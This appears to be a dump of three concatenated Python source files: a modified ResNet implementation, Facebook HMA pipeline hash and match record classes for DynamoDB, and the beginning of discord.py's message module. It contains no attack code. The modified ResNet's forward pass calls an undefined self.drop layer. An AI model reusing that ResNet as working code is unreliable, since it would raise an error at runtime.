replace_stride_with_dilation: Optional[List[bool]] = None,
norm_layer: Optional[Callable[..., nn.Module]] = None
) -> None:
super(ResNet, self).__init__()
if norm_layer is None:
norm_layer = nn.BatchNorm2d
self._norm_layer = norm_layer
self.inplanes = 64
self.dilation = 1
if replace_stride_with_dilation is None:
# each element in the tuple indicates if we should replace
# the 2x2 stride with a dilated convolution instead
replace_stride_with_dilation = [False, False, False]
if len(replace_stride_with_dilation) != 3:
raise ValueError("replace_stride_with_dilation should be None "
"or a 3-element tuple, got {}".format(replace_stride_with_dilation))
self.groups = groups
self.base_width = width_per_group
self.conv1 = nn.Conv2d(3, self.inplanes, kernel_size=7, stride=2, padding=3,
bias=False)
self.bn1 = norm_layer(self.inplanes)
self.relu = nn.ReLU(inplace=True)
self.maxpool = nn.MaxPool2d(kernel_size=3, stride=2, padding=1)
self.layer1 = self._make_layer(block, 64, layers[0])
self.layer2 = self._make_layer(block, 128, layers[1], stride=2,
dilate=replace_stride_with_dilation[0])
self.layer3 = self._make_layer(block, 256, layers[2], stride=2,
dilate=replace_stride_with_dilation[1])
self.layer4 = self._make_layer(block, 512, layers[3], stride=2,
dilate=replace_stride_with_dilation[2])
self.avgpool = nn.AdaptiveAvgPool2d((1, 1))
self.fc = nn.Linear(128 * block.expansion, num_classes)
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
elif isinstance(m, (nn.BatchNorm2d, nn.GroupNorm)):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
# Zero-initialize the last BN in each residual branch,
# so that the residual branch starts with zeros, and each residual block behaves like an identity.
# This improves the model by 0.2~0.3% according to https://arxiv.org/abs/1706.02677
if zero_init_residual:
for m in self.modules():
if isinstance(m, Bottleneck):
nn.init.constant_(m.bn3.weight, 0) # type: ignore[arg-type]
elif isinstance(m, BasicBlock):
nn.init.constant_(m.bn2.weight, 0) # type: ignore[arg-type]
def _make_layer(self, block: Type[Union[BasicBlock, Bottleneck]], planes: int, blocks: int,
stride: int = 1, dilate: bool = False) -> nn.Sequential:
norm_layer = self._norm_layer
downsample = None
previous_dilation = self.dilation
if dilate:
self.dilation *= stride
stride = 1
if stride != 1 or self.inplanes != planes * block.expansion:
downsample = nn.Sequential(
conv1x1(self.inplanes, planes * block.expansion, stride),
norm_layer(planes * block.expansion),
)
layers = []
layers.append(block(self.inplanes, planes, stride, downsample, self.groups,
self.base_width, previous_dilation, norm_layer))
self.inplanes = planes * block.expansion
for _ in range(1, blocks):
layers.append(block(self.inplanes, planes, groups=self.groups,
base_width=self.base_width, dilation=self.dilation,
norm_layer=norm_layer))
return nn.Sequential(*layers)
def _forward_impl(self, x: Tensor) -> Tensor:
# See note [TorchScript super()]
x = self.conv1(x)
x = self.bn1(x)
x = self.relu(x)
x = self.maxpool(x)
x = self.layer1(x)
x = self.layer2(x)
#x = self.layer3(x)
#x = self.layer4(x)
x = self.drop(x)
x = self.avgpool(x)
x = torch.flatten(x, 1)
x = self.fc(x)
return x
def forward(self, x: Tensor) -> Tensor:
return self._forward_impl(x)
def _resnet(
arch: str,
block: Type[Union[BasicBlock, Bottleneck]],
layers: List[int],
pretrained: bool,
progress: bool,
**kwargs: Any
) -> ResNet:
model = ResNet(block, layers, **kwargs)
if pretrained:
state_dict = load_state_dict_from_url(model_urls[arch],
progress=progress)
model.load_state_dict(state_dict)
return model
def improved_resnet18(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-18 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet18', BasicBlock, [2, 2, 2, 2], pretrained, progress,
**kwargs)
def improved_resnet34(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-34 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet34', BasicBlock, [3, 4, 6, 3], pretrained, progress,
**kwargs)
def improved_resnet50(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-50 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet50', Bottleneck, [3, 4, 6, 3], pretrained, progress,
**kwargs)
def improved_resnet101(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-101 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet101', Bottleneck, [3, 4, 23, 3], pretrained, progress,
**kwargs)
def improved_resnet152(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNet-152 model from
`"Deep Residual Learning for Image Recognition" <https://arxiv.org/pdf/1512.03385.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
return _resnet('resnet152', Bottleneck, [3, 8, 36, 3], pretrained, progress,
**kwargs)
def improved_resnext50_32x4d(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNeXt-50 32x4d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 4
return _resnet('resnext50_32x4d', Bottleneck, [3, 4, 6, 3],
pretrained, progress, **kwargs)
def improved_resnext101_32x8d(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""ResNeXt-101 32x8d model from
`"Aggregated Residual Transformation for Deep Neural Networks" <https://arxiv.org/pdf/1611.05431.pdf>`_.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['groups'] = 32
kwargs['width_per_group'] = 8
return _resnet('resnext101_32x8d', Bottleneck, [3, 4, 23, 3],
pretrained, progress, **kwargs)
def improved_wide_resnet50_2(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""Wide ResNet-50-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_.
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet50_2', Bottleneck, [3, 4, 6, 3],
pretrained, progress, **kwargs)
def improved_wide_resnet101_2(pretrained: bool = False, progress: bool = True, **kwargs: Any) -> ResNet:
r"""Wide ResNet-101-2 model from
`"Wide Residual Networks" <https://arxiv.org/pdf/1605.07146.pdf>`_.
The model is the same as ResNet except for the bottleneck number of channels
which is twice larger in every block. The number of channels in outer 1x1
convolutions is the same, e.g. last block in ResNet-50 has 2048-512-2048
channels, and in Wide ResNet-50-2 has 2048-1024-2048.
Args:
pretrained (bool): If True, returns a model pre-trained on ImageNet
progress (bool): If True, displays a progress bar of the download to stderr
"""
kwargs['width_per_group'] = 64 * 2
return _resnet('wide_resnet101_2', Bottleneck, [3, 4, 23, 3],
pretrained, progress, **kwargs)
|
py | 7df7f6c13d2055e27b712f42b0fafd65e53dbbc9 | # Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved
import datetime
from decimal import Decimal
import typing as t
from dataclasses import dataclass, field
from mypy_boto3_dynamodb.service_resource import Table
from boto3.dynamodb.conditions import Key
from threatexchange.content_type.meta import get_signal_types_by_name
from threatexchange.signal_type.signal_base import SignalType
from hmalib.common.models.models_base import DynamoDBItem, DynamoDBCursorKey
"""
Data transfer object classes to be used with dynamodbstore
Classes in this module should implement methods `to_dynamodb_item(self)` and
`to_sqs_message(self)`
"""
@dataclass
class RecentItems:
last_evaluated_key: DynamoDBCursorKey
# TODO: Can be generified for stronger typing.
items: t.List[t.Any]
@dataclass
class PipelineRecordBase(DynamoDBItem):
"""
Base Class for records of pieces of content going through the
hashing/matching pipeline.
"""
content_id: str
signal_type: t.Type[SignalType]
content_hash: str
updated_at: datetime.datetime
def to_dynamodb_item(self) -> dict:
raise NotImplementedError
def to_sqs_message(self) -> dict:
raise NotImplementedError
@classmethod
def get_recent_items_page(
cls, table: Table, ExclusiveStartKey: t.Optional[DynamoDBCursorKey] = None
) -> RecentItems:
"""
Get a paginated list of recent items. The API is purposefully kept
"""
raise NotImplementedError
@dataclass
class PipelineRecordDefaultsBase:
"""
Hash and match records may have signal_type specific attributes that are not
universal. eg. PDQ hashes have quality and PDQ matches have distance while
MD5 has neither. Assuming such signal_type specific attributes will not be
indexed, we are choosing to put them into a bag of variables. See
PipelineRecordBase.[de]serialize_signal_specific_attributes() to understand
storage.
Ideally, this would be an attribute with defaults, but that would make
inheritance complicated because default_values would precede non-default
values in the sub class.
"""
signal_specific_attributes: t.Dict[str, t.Union[int, float, str]] = field(
default_factory=dict
)
def serialize_signal_specific_attributes(self) -> dict:
"""
Converts signal_specific_attributes into a dict. Uses the signal_type as
a prefix.
So for PDQ hash records, `item.signal_specific_attributes.quality` will
become `item.pdq_quality`. Storing as top-level item attributes allows
indexing if we need it later. You can't do that with nested elements.
"""
# Note on Typing: PipelineRecordDefaultsBase is meant to be used with
# PipelineRecordBase. So it will have access to all fields from
# PipelineRecordBase. This is (impossible?) to express using mypy. So
# ignore self.signal_type
return {
f"{self.signal_type.get_name()}_{key}": value # type:ignore
for key, value in self.signal_specific_attributes.items()
}
@staticmethod
def _signal_specific_attribute_remove_prefix(prefix: str, k: str) -> str:
return k[len(prefix) :]
@classmethod
def deserialize_signal_specific_attributes(
cls, d: t.Dict[str, t.Any]
) -> t.Dict[str, t.Union[int, float, str]]:
"""
Reverses serialize_signal_specific_attributes.
"""
signal_type = d["SignalType"]
signal_type_prefix = f"{signal_type}_"
return {
cls._signal_specific_attribute_remove_prefix(signal_type_prefix, key): value
for key, value in d.items()
if key.startswith(signal_type_prefix)
}
@dataclass
class PipelineHashRecord(PipelineRecordDefaultsBase, PipelineRecordBase):
"""
Successful execution at the hasher produces this record.
"""
def to_dynamodb_item(self) -> dict:
top_level_overrides = self.serialize_signal_specific_attributes()
return dict(
**top_level_overrides,
**{
"PK": self.get_dynamodb_content_key(self.content_id),
"SK": self.get_dynamodb_type_key(self.signal_type.get_name()),
"ContentHash": self.content_hash,
"SignalType": self.signal_type.get_name(),
"GSI2-PK": self.get_dynamodb_type_key(self.__class__.__name__),
"UpdatedAt": self.updated_at.isoformat(),
},
)
def to_legacy_sqs_message(self) -> dict:
"""
Prior to supporting MD5, the hash message was simplistic and did not
support all fields in the PipelineHashRecord. This is inconsistent with
almost all other message models.
We can remove this once pdq_hasher and pdq_matcher are removed.
"""
return {
"hash": self.content_hash,
"type": self.signal_type.get_name(),
"key": self.content_id,
}
def to_sqs_message(self) -> dict:
return {
"ContentId": self.content_id,
"SignalType": self.signal_type.get_name(),
"ContentHash": self.content_hash,
"SignalSpecificAttributes": self.signal_specific_attributes,
"UpdatedAt": self.updated_at.isoformat(),
}
@classmethod
def from_sqs_message(cls, d: dict) -> "PipelineHashRecord":
return cls(
content_id=d["ContentId"],
signal_type=get_signal_types_by_name()[d["SignalType"]],
content_hash=d["ContentHash"],
signal_specific_attributes=d["SignalSpecificAttributes"],
updated_at=datetime.datetime.fromisoformat(d["UpdatedAt"]),
)
@classmethod
def could_be(cls, d: dict) -> bool:
"""
Return True if this dict can be converted to a PipelineHashRecord
"""
return "ContentId" in d and "SignalType" in d and "ContentHash" in d
@classmethod
def get_from_content_id(
cls,
table: Table,
content_id: str,
signal_type: t.Optional[t.Type[SignalType]] = None,
) -> t.List["PipelineHashRecord"]:
"""
Returns all available PipelineHashRecords for a content_id.
"""
expected_pk = cls.get_dynamodb_content_key(content_id)
if signal_type is None:
condition_expression = Key("PK").eq(expected_pk) & Key("SK").begins_with(
DynamoDBItem.TYPE_PREFIX
)
else:
condition_expression = Key("PK").eq(expected_pk) & Key("SK").eq(
DynamoDBItem.get_dynamodb_type_key(signal_type.get_name())
)
return cls._result_items_to_records(
table.query(
KeyConditionExpression=condition_expression,
).get("Items", [])
)
@classmethod
def get_recent_items_page(
cls, table: Table, exclusive_start_key: t.Optional[DynamoDBCursorKey] = None
) -> RecentItems:
"""
Get a paginated list of recent items.
"""
if not exclusive_start_key:
# Evidently, https://github.com/boto/boto3/issues/2813 boto is able
# to distinguish fun(Parameter=None) from fun(). So, we can't use
# exclusive_start_key's optionality. We have to do an if clause!
# Fun!
result = table.query(
IndexName="GSI-2",
ScanIndexForward=False,
Limit=100,
KeyConditionExpression=Key("GSI2-PK").eq(
DynamoDBItem.get_dynamodb_type_key(cls.__name__)
),
)
else:
result = table.query(
IndexName="GSI-2",
ExclusiveStartKey=exclusive_start_key,
ScanIndexForward=False,
Limit=100,
KeyConditionExpression=Key("GSI2-PK").eq(
DynamoDBItem.get_dynamodb_type_key(cls.__name__)
),
)
return RecentItems(
t.cast(DynamoDBCursorKey, result.get("LastEvaluatedKey", None)),
cls._result_items_to_records(result["Items"]),
)
@classmethod
def _result_items_to_records(
cls,
items: t.List[t.Dict],
) -> t.List["PipelineHashRecord"]:
"""
Get a paginated list of recent hash records. Subsequent calls must use
`return_value.last_evaluated_key`.
"""
return [
PipelineHashRecord(
content_id=item["PK"][len(cls.CONTENT_KEY_PREFIX) :],
signal_type=get_signal_types_by_name()[item["SignalType"]],
content_hash=item["ContentHash"],
updated_at=datetime.datetime.fromisoformat(item["UpdatedAt"]),
signal_specific_attributes=cls.deserialize_signal_specific_attributes(
item
),
)
for item in items
]
@dataclass
class _MatchRecord(PipelineRecordBase):
"""
Successful execution at the matcher produces this record.
"""
signal_id: str
signal_source: str
signal_hash: str
@dataclass
class MatchRecord(PipelineRecordDefaultsBase, _MatchRecord):
"""
Weird, innit? You can't introduce non-default fields after default fields.
All default fields in PipelineRecordBase are actually in
PipelineRecordDefaultsBase and this complex inheritance chain allows you to
create an MRO that is legal.
H/T:
https://stackoverflow.com/questions/51575931/class-inheritance-in-python-3-7-dataclasses
"""
def to_dynamodb_item(self) -> dict:
top_level_overrides = self.serialize_signal_specific_attributes()
return dict(
**top_level_overrides,
**{
"PK": self.get_dynamodb_content_key(self.content_id),
"SK": self.get_dynamodb_signal_key(self.signal_source, self.signal_id),
"ContentHash": self.content_hash,
"UpdatedAt": self.updated_at.isoformat(),
"SignalHash": self.signal_hash,
"SignalSource": self.signal_source,
"SignalType": self.signal_type.get_name(),
"GSI1-PK": self.get_dynamodb_signal_key(
self.signal_source, self.signal_id
),
"GSI1-SK": self.get_dynamodb_content_key(self.content_id),
"HashType": self.signal_type.get_name(),
"GSI2-PK": self.get_dynamodb_type_key(self.__class__.__name__),
},
)
def to_sqs_message(self) -> dict:
# TODO add method for when matches are added to a sqs
raise NotImplementedError
@classmethod
def get_from_content_id(
cls, table: Table, content_id: str
) -> t.List["MatchRecord"]:
"""
Return all matches for a content_id.
"""
content_key = DynamoDBItem.get_dynamodb_content_key(content_id)
source_prefix = DynamoDBItem.SIGNAL_KEY_PREFIX
return cls._result_items_to_records(
table.query(
KeyConditionExpression=Key("PK").eq(content_key)
& Key("SK").begins_with(source_prefix),
).get("Items", [])
)
@classmethod
def get_from_signal(
cls, table: Table, signal_id: t.Union[str, int], signal_source: str
) -> t.List["MatchRecord"]:
"""
Return all matches for a signal. Needs source and id to uniquely
identify a signal.
"""
signal_key = DynamoDBItem.get_dynamodb_signal_key(signal_source, signal_id)
return cls._result_items_to_records(
table.query(
IndexName="GSI-1",
KeyConditionExpression=Key("GSI1-PK").eq(signal_key),
).get("Items", [])
)
@classmethod
def get_recent_items_page(
cls, table: Table, exclusive_start_key: t.Optional[DynamoDBCursorKey] = None
) -> RecentItems:
"""
Get a paginated list of recent match records. Subsequent calls must use
`return_value.last_evaluated_key`.
"""
if not exclusive_start_key:
# Evidently, https://github.com/boto/boto3/issues/2813 boto is able
# to distinguish fun(Parameter=None) from fun(). So, we can't use
# exclusive_start_key's optionality. We have to do an if clause!
# Fun!
result = table.query(
IndexName="GSI-2",
Limit=100,
ScanIndexForward=False,
KeyConditionExpression=Key("GSI2-PK").eq(
DynamoDBItem.get_dynamodb_type_key(cls.__name__)
),
)
else:
result = table.query(
IndexName="GSI-2",
Limit=100,
ExclusiveStartKey=exclusive_start_key,
ScanIndexForward=False,
KeyConditionExpression=Key("GSI2-PK").eq(
DynamoDBItem.get_dynamodb_type_key(cls.__name__)
),
)
return RecentItems(
t.cast(DynamoDBCursorKey, result.get("LastEvaluatedKey", None)),
cls._result_items_to_records(result["Items"]),
)
@classmethod
def _result_items_to_records(
cls,
items: t.List[t.Dict],
) -> t.List["MatchRecord"]:
return [
MatchRecord(
content_id=cls.remove_content_key_prefix(item["PK"]),
content_hash=item["ContentHash"],
updated_at=datetime.datetime.fromisoformat(item["UpdatedAt"]),
signal_type=get_signal_types_by_name()[item["SignalType"]],
signal_id=cls.remove_signal_key_prefix(
item["SK"], item["SignalSource"]
),
signal_source=item["SignalSource"],
signal_hash=item["SignalHash"],
signal_specific_attributes=cls.deserialize_signal_specific_attributes(
item
),
)
for item in items
]
|
py | 7df7f6c9db33a2ef20ce9a7b5ca92fe9e86a1a01 | # -*- coding: utf-8 -*-
"""
The MIT License (MIT)
Copyright (c) 2015-present Rapptz
Permission is hereby granted, free of charge, to any person obtaining a
copy of this software and associated documentation files (the "Software"),
to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense,
and/or sell copies of the Software, and to permit persons to whom the
Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in
all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
DEALINGS IN THE SOFTWARE.
"""
import asyncio
import datetime
import re
import io
from . import utils
from .reaction import Reaction
from .emoji import Emoji
from .partial_emoji import PartialEmoji
from .calls import CallMessage
from .enums import MessageType, ChannelType, try_enum
from .errors import InvalidArgument, ClientException, HTTPException
from .embeds import Embed
from .member import Member
from .flags import MessageFlags
from .file import File
from .utils import escape_mentions
from .guild import Guild
from .mixins import Hashable
from .sticker import Sticker
__all__ = (
'Attachment',
'Message',
'PartialMessage',
'MessageReference',
'DeletedReferencedMessage',
)
def convert_emoji_reaction(emoji):
if isinstance(emoji, Reaction):
emoji = emoji.emoji
if isinstance(emoji, Emoji):
return '%s:%s' % (emoji.name, emoji.id)
if isinstance(emoji, PartialEmoji):
return emoji._as_reaction()
if isinstance(emoji, str):
# Reactions can be in :name:id format, but not <:name:id>.
# No existing emojis have <> in them, so this should be okay.
return emoji.strip('<>')
raise InvalidArgument('emoji argument must be str, Emoji, or Reaction not {.__class__.__name__}.'.format(emoji))
class Attachment:
"""Represents an attachment from Discord.
Attributes
------------
id: :class:`int`
The attachment ID.
size: :class:`int`
The attachment size in bytes.
height: Optional[:class:`int`]
The attachment's height, in pixels. Only applicable to images and videos.
width: Optional[:class:`int`]
The attachment's width, in pixels. Only applicable to images and videos.
filename: :class:`str`
The attachment's filename.
url: :class:`str`
The attachment URL. If the message this attachment was attached
to is deleted, then this will 404.
proxy_url: :class:`str`
The proxy URL. This is a cached version of the :attr:`~Attachment.url` in the
case of images. When the message is deleted, this URL might be valid for a few
minutes or not valid at all.
"""
__slots__ = ('id', 'size', 'height', 'width', 'filename', 'url', 'proxy_url', '_http')
def __init__(self, *, data, state):
self.id = int(data['id'])
self.size = data['size']
self.height = data.get('height')
self.width = data.get('width')
self.filename = data['filename']
self.url = data.get('url')
self.proxy_url = data.get('proxy_url')
self._http = state.http
def is_spoiler(self):
""":class:`bool`: Whether this attachment contains a spoiler."""
return self.filename.startswith('SPOILER_')
def __repr__(self):
return '<Attachment id={0.id} filename={0.filename!r} url={0.url!r}>'.format(self)
async def save(self, fp, *, seek_begin=True, use_cached=False):
"""|coro|
Saves this attachment into a file-like object.
Parameters
-----------
fp: Union[:class:`io.BufferedIOBase`, :class:`os.PathLike`]
The file-like object to save this attachment to or the filename
to use. If a filename is passed then a file is created with that
filename and used instead.
seek_begin: :class:`bool`
Whether to seek to the beginning of the file after saving is
successfully done.
use_cached: :class:`bool`
Whether to use :attr:`proxy_url` rather than :attr:`url` when downloading
the attachment. This will allow attachments to be saved after deletion
more often, compared to the regular URL which is generally deleted right
after the message is deleted. Note that this can still fail to download
deleted attachments if too much time has passed and it does not work
on some types of attachments.
Raises
--------
HTTPException
Saving the attachment failed.
NotFound
The attachment was deleted.
Returns
--------
:class:`int`
The number of bytes written.
"""
data = await self.read(use_cached=use_cached)
if isinstance(fp, io.IOBase) and fp.writable():
written = fp.write(data)
if seek_begin:
fp.seek(0)
return written
else:
with open(fp, 'wb') as f:
return f.write(data)
async def read(self, *, use_cached=False):
"""|coro|
Retrieves the content of this attachment as a :class:`bytes` object.
.. versionadded:: 1.1
Parameters
-----------
use_cached: :class:`bool`
Whether to use :attr:`proxy_url` rather than :attr:`url` when downloading
the attachment. This will allow attachments to be saved after deletion
more often, compared to the regular URL which is generally deleted right
after the message is deleted. Note that this can still fail to download
deleted attachments if too much time has passed and it does not work
on some types of attachments.
Raises
------
HTTPException
Downloading the attachment failed.
Forbidden
You do not have permissions to access this attachment
NotFound
The attachment was deleted.
Returns
-------
:class:`bytes`
The contents of the attachment.
"""
url = self.proxy_url if use_cached else self.url
data = await self._http.get_from_cdn(url)
return data
async def to_file(self, *, use_cached=False, spoiler=False):
"""|coro|
Converts the attachment into a :class:`File` suitable for sending via
:meth:`abc.Messageable.send`.
.. versionadded:: 1.3
Parameters
-----------
use_cached: :class:`bool`
Whether to use :attr:`proxy_url` rather than :attr:`url` when downloading
the attachment. This will allow attachments to be saved after deletion
more often, compared to the regular URL which is generally deleted right
after the message is deleted. Note that this can still fail to download
deleted attachments if too much time has passed and it does not work
on some types of attachments.
.. versionadded:: 1.4
spoiler: :class:`bool`
Whether the file is a spoiler.
.. versionadded:: 1.4
Raises
------
HTTPException
Downloading the attachment failed.
Forbidden
You do not have permissions to access this attachment
NotFound
The attachment was deleted.
Returns
-------
:class:`File`
The attachment as a file suitable for sending.
"""
data = await self.read(use_cached=use_cached)
return File(io.BytesIO(data), filename=self.filename, spoiler=spoiler)
class DeletedReferencedMessage:
"""A special sentinel type that denotes whether the
resolved message referenced message had since been deleted.
The purpose of this class is to separate referenced messages that could not be
fetched and those that were previously fetched but have since been deleted.
.. versionadded:: 1.6
"""
__slots__ = ('_parent')
def __init__(self, parent):
self._parent = parent
@property
def id(self):
""":class:`int`: The message ID of the deleted referenced message."""
return self._parent.message_id
@property
def channel_id(self):
""":class:`int`: The channel ID of the deleted referenced message."""
return self._parent.channel_id
@property
def guild_id(self):
"""Optional[:class:`int`]: The guild ID of the deleted referenced message."""
return self._parent.guild_id
class MessageReference:
"""Represents a reference to a :class:`~discord.Message`.
.. versionadded:: 1.5
.. versionchanged:: 1.6
This class can now be constructed by users.
Attributes
-----------
message_id: Optional[:class:`int`]
The id of the message referenced.
channel_id: :class:`int`
The channel id of the message referenced.
guild_id: Optional[:class:`int`]
The guild id of the message referenced.
resolved: Optional[Union[:class:`Message`, :class:`DeletedReferencedMessage`]]
The message that this reference resolved to. If this is ``None``
then the original message was not fetched either due to the Discord API
not attempting to resolve it or it not being available at the time of creation.
If the message was resolved at a prior point but has since been deleted then
this will be of type :class:`DeletedReferencedMessage`.
Currently, this is mainly the replied to message when a user replies to a message.
.. versionadded:: 1.6
"""
__slots__ = ('message_id', 'channel_id', 'guild_id', 'resolved', '_state')
def __init__(self, *, message_id, channel_id, guild_id=None):
self._state = None
self.resolved = None
self.message_id = message_id
self.channel_id = channel_id
self.guild_id = guild_id
@classmethod
def with_state(cls, state, data):
self = cls.__new__(cls)
self.message_id = utils._get_as_snowflake(data, 'message_id')
self.channel_id = int(data.pop('channel_id'))
self.guild_id = utils._get_as_snowflake(data, 'guild_id')
self._state = state
self.resolved = None
return self
@classmethod
def from_message(cls, message):
"""Creates a :class:`MessageReference` from an existing :class:`~discord.Message`.
.. versionadded:: 1.6
Parameters
----------
message: :class:`~discord.Message`
The message to be converted into a reference.
Returns
-------
:class:`MessageReference`
A reference to the message.
"""
self = cls(message_id=message.id, channel_id=message.channel.id, guild_id=getattr(message.guild, 'id', None))
self._state = message._state
return self
@property
def cached_message(self):
"""Optional[:class:`~discord.Message`]: The cached message, if found in the internal message cache."""
return self._state._get_message(self.message_id)
@property
def jump_url(self):
""":class:`str`: Returns a URL that allows the client to jump to the referenced message.
.. versionadded:: 1.7
"""
guild_id = self.guild_id if self.guild_id is not None else '@me'
return 'https://discord.com/channels/{0}/{1.channel_id}/{1.message_id}'.format(guild_id, self)
def __repr__(self):
return '<MessageReference message_id={0.message_id!r} channel_id={0.channel_id!r} guild_id={0.guild_id!r}>'.format(self)
def to_dict(self):
result = {'message_id': self.message_id} if self.message_id is not None else {}
result['channel_id'] = self.channel_id
if self.guild_id is not None:
result['guild_id'] = self.guild_id
return result
to_message_reference_dict = to_dict
def flatten_handlers(cls):
prefix = len('_handle_')
handlers = [
(key[prefix:], value)
for key, value in cls.__dict__.items()
if key.startswith('_handle_') and key != '_handle_member'
]
# store _handle_member last
handlers.append(('member', cls._handle_member))
cls._HANDLERS = handlers
cls._CACHED_SLOTS = [
attr for attr in cls.__slots__ if attr.startswith('_cs_')
]
return cls
@flatten_handlers
class Message(Hashable):
r"""Represents a message from Discord.
.. container:: operations
.. describe:: x == y
Checks if two messages are equal.
.. describe:: x != y
Checks if two messages are not equal.
.. describe:: hash(x)
Returns the message's hash.
Attributes
-----------
tts: :class:`bool`
Specifies if the message was done with text-to-speech.
This can only be accurately received in :func:`on_message` due to
a discord limitation.
type: :class:`MessageType`
The type of message. In most cases this should not be checked, but it is helpful
in cases where it might be a system message for :attr:`system_content`.
author: :class:`abc.User`
A :class:`Member` that sent the message. If :attr:`channel` is a
private channel or the user has the left the guild, then it is a :class:`User` instead.
content: :class:`str`
The actual contents of the message.
nonce
The value used by the discord guild and the client to verify that the message is successfully sent.
This is typically non-important.
embeds: List[:class:`Embed`]
A list of embeds the message has.
channel: Union[:class:`abc.Messageable`]
The :class:`TextChannel` that the message was sent from.
Could be a :class:`DMChannel` or :class:`GroupChannel` if it's a private message.
call: Optional[:class:`CallMessage`]
The call that the message refers to. This is only applicable to messages of type
:attr:`MessageType.call`.
reference: Optional[:class:`~discord.MessageReference`]
The message that this message references. This is only applicable to messages of
type :attr:`MessageType.pins_add`, crossposted messages created by a
followed channel integration, or message replies.
.. versionadded:: 1.5
mention_everyone: :class:`bool`
Specifies if the message mentions everyone.
.. note::
This does not check if the ``@everyone`` or the ``@here`` text is in the message itself.
Rather this boolean indicates if either the ``@everyone`` or the ``@here`` text is in the message
**and** it did end up mentioning.
mentions: List[:class:`abc.User`]
A list of :class:`Member` that were mentioned. If the message is in a private message
then the list will be of :class:`User` instead. For messages that are not of type
:attr:`MessageType.default`\, this array can be used to aid in system messages.
For more information, see :attr:`system_content`.
.. warning::
The order of the mentions list is not in any particular order so you should
not rely on it. This is a Discord limitation, not one with the library.
channel_mentions: List[:class:`abc.GuildChannel`]
A list of :class:`abc.GuildChannel` that were mentioned. If the message is in a private message
then the list is always empty.
role_mentions: List[:class:`Role`]
A list of :class:`Role` that were mentioned. If the message is in a private message
then the list is always empty.
id: :class:`int`
The message ID.
webhook_id: Optional[:class:`int`]
If this message was sent by a webhook, then this is the webhook ID's that sent this
message.
attachments: List[:class:`Attachment`]
A list of attachments given to a message.
pinned: :class:`bool`
Specifies if the message is currently pinned.
flags: :class:`MessageFlags`
Extra features of the message.
.. versionadded:: 1.3
reactions : List[:class:`Reaction`]
Reactions to a message. Reactions can be either custom emoji or standard unicode emoji.
activity: Optional[:class:`dict`]
The activity associated with this message. Sent with Rich-Presence related messages that for
example, request joining, spectating, or listening to or with another member.
It is a dictionary with the following optional keys:
- ``type``: An integer denoting the type of message activity being requested.
- ``party_id``: The party ID associated with the party.
application: Optional[:class:`dict`]
The rich presence enabled application associated with this message.
It is a dictionary with the following keys:
- ``id``: A string representing the application's ID.
- ``name``: A string representing the application's name.
- ``description``: A string representing the application's description.
- ``icon``: A string representing the icon ID of the application.
- ``cover_image``: A string representing the embed's image asset ID.
stickers: List[:class:`Sticker`]
A list of stickers given to the message.
.. versionadded:: 1.6
"""
__slots__ = ('_edited_timestamp', 'tts', 'content', 'channel', 'webhook_id',
'mention_everyone', 'embeds', 'id', 'mentions', 'author',
'_cs_channel_mentions', '_cs_raw_mentions', 'attachments',
